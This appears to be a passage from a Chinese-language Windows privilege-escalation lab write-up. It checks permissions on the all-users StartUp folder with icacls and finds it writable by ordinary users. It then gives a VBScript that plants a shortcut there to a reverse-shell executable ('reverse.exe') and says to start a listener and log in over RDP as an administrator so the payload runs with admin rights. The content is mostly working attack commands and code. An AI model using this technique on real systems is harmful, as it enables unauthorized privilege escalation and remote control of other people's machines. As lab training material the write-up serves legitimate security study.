查看 C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp权限
C:\Users\user>icacls "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp BUILTIN\Users:(OI)(CI)(F)WIN-QBA94KB3IOF\Administrator:(I)(OI)(CI)(DE,DC)WIN-QBA94KB3IOF\admin:(I)(OI)(CI)(DE,DC)NT AUTHORITY\SYSTEM:(I)(OI)(CI)(F)BUILTIN\Administrators:(I)(OI)(CI)(F)BUILTIN\Users:(I)(OI)(CI)(RX)Everyone:(I)(OI)(CI)(RX)Successfully processed 1 files; Failed processing 0 files
我们使用一个脚本在 StartUp目录创建一个指向我们的可执行恶意文件的快捷方式
cscript C:\PrivEsc\CreateShortcut.vbs
Set oWS = WScript.CreateObject("WScript.Shell")sLinkFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\reverse.lnk"Set oLink = oWS.CreateShortcut(sLinkFile)oLink.TargetPath = "C:\PrivEsc\reverse.exe"oLink.Save
然后开启监听并使用 RDP 进行登录:
rdesktop -u admin 10.10.21.109
